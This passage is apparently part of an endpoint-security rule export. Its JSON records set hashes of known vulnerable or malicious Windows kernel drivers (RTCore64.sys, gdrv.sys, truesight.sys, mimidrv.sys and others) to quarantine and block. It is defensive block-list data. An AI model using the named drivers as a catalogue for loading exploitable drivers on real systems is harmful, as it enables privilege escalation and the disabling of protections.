+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cbfd3ad2-30a8-5d43-8a3a-58dd34ad2527",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143278Z",
+ "creation_date": "2026-03-23T11:45:32.143280Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143286Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f2cf1c9502c5c5054edb556827ba30ffc2e6689faf807db404672781b032eaf",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc0fb1a5-ab03-5a9e-9b99-23b4157bdc31",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144239Z",
+ "creation_date": "2026-03-23T11:45:32.144242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce106afd6a9996ac0150709a30d61ece7d7bfe1f27492c00f4fabab9ec40575d",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc211c39-1c18-50b4-8fc4-19ab2100642c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460766Z",
+ "creation_date": "2026-03-23T11:45:30.460769Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460778Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "63af3fdb1e85949c8adccb43f09ca4556ae258b363a99ae599e1e834d34c8670",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc26991c-7a8d-5f32-8da1-2ac9bdaee044",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461412Z",
+ "creation_date": "2026-03-23T11:45:30.461416Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c09dfc18959fe51d3e5ca1500a94ab74faf0eb72040930e89cdbac653df9e816",
+ "comment": "Vulnerable Kernel Driver (aka sfdrvx64.sys) [https://www.loldrivers.io/drivers/5a03dc5a-115d-4d6f-b5b5-685f4c014a69/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc2ae10a-2b78-532c-b490-541ba4da7ce1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816730Z",
+ "creation_date": "2026-03-23T11:45:30.816732Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816737Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8a34012c22a650972b9ecad988d346c8670bcd51ea2dd3ab7fe4562e117f1b9",
+ "comment": "Vulnerable Kernel Driver (aka tdeio64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc2d271c-83f8-5eb7-bd88-00f6fc15ceae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159925Z",
+ "creation_date": "2026-03-23T11:45:31.159927Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd0a5c191a978babdeb51d51a04febf704eba136340779428d81ebc943ea414c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc532f37-a6b6-55c9-ba2d-913f68dd3b66",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828512Z",
+ "creation_date": "2026-03-23T11:45:31.828514Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828520Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6181015e118e8608d4566b40ba17989687fa2ea747c5f8f1905b5a234cfeebeb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc54e382-f4eb-5e6d-bde3-a6f577ae4666",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819154Z",
+ "creation_date": "2026-03-23T11:45:31.819156Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819161Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "696cef6890b99a72a0f92b6bd3d9e5ad490f29974c559fda2242f85534585700",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc5973e9-d3f5-5a2a-a478-1ed80d58e913",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830295Z",
+ "creation_date": "2026-03-23T11:45:30.830297Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830303Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd6451ffd62f127371b838d4ab8e353df383b38b548f0cce33fa70cdad4ee13b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc5e17e2-978f-5162-9e1c-dc42fca4d15f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829959Z",
+ "creation_date": "2026-03-23T11:45:30.829962Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829967Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35ae4385e59c4ad684d6344ceb4c1fed53589fb56afb4b0c639bacd11356664c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc5f6ed9-5fa8-5235-8991-3dd4a51267dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811327Z",
+ "creation_date": "2026-03-23T11:45:31.811329Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811335Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c428d3faddd8e0f6678ced8e923eed078877e5ee6cf7b2c20b29315f84b5a8b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc5fa0d0-0654-55cd-ab17-687ba6bad1f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456306Z",
+ "creation_date": "2026-03-23T11:45:30.456309Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456318Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11bc55c0771d692279298211c1d434c04168e7c7f7c4328bfd600215b88c819b",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc7033d3-76d0-5f11-8d6b-a5128db279d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145018Z",
+ "creation_date": "2026-03-23T11:45:31.145020Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145025Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a03d159cd02bf1f8cda64a0843dd4ee7379dde9030985ede6c8a16e3b854c112",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc719060-d526-59b9-a627-8860bbe62c15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473514Z",
+ "creation_date": "2026-03-23T11:45:30.473517Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473526Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c84b0dbc0024c88c61a06d0aa7663a17a15e7c062f185811c5d85e1155e25aeb",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc8750b8-4d37-5a54-8aec-dee239575a58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606309Z",
+ "creation_date": "2026-03-23T11:45:29.606312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee24071d9a0ef38dc98929cfb4d316f9fb010de107c110fad2403022cf1eebfc",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cc890b60-3935-5bd3-a1f1-a8dd4f623dd9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823845Z",
+ "creation_date": "2026-03-23T11:45:30.823848Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823853Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60744995c1eb14063a6f33e17c77f081c05a4e7bc4d4154e291a70d74d44efce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cca11486-603e-578d-ba67-e7a279a86c8c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816748Z",
+ "creation_date": "2026-03-23T11:45:30.816750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816756Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8fc8e3a1348393c5d7c3a84bcbae383d85a4721a751ad7afac5428e5e579b4e",
+ "comment": "Vulnerable Kernel Driver (aka WiRwaDrv.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ccb4faf1-d1de-5882-8ccf-161101d53056",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812028Z",
+ "creation_date": "2026-03-23T11:45:31.812030Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812035Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c891c2b8dc44d5b8c3156011f3daed4c15f88987ac712f5500e2b1f5248320e0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ccb50528-c00c-538c-8329-5946a44a33ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607276Z",
+ "creation_date": "2026-03-23T11:45:29.607278Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607283Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40061b30b1243be76d5283cbc8abfe007e148097d4de7337670ff1536c4c7ba1",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ccb56504-0f4b-5314-8590-1fe56ae9466f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608968Z",
+ "creation_date": "2026-03-23T11:45:29.608970Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608975Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "133e542842656197c5d22429bd56d57aa33c9522897fdf29853a6d321033c743",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ccc1ba0b-b9a5-52dc-ad3c-5e5c5f484ad8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468433Z",
+ "creation_date": "2026-03-23T11:45:30.468437Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468445Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba467c6edee7266721c220fbc84cb80c995d429052846865d869609602d6e48c",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cccd6743-9e7d-5fcb-9711-b5aa0d58db4e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814414Z",
+ "creation_date": "2026-03-23T11:45:31.814417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "386b6aef03c78da2152aa5a111334233a101e5f2b64da7ac1acd48df07cad8fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cce8da9f-c3bc-54d2-a25d-346d2c879ae5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
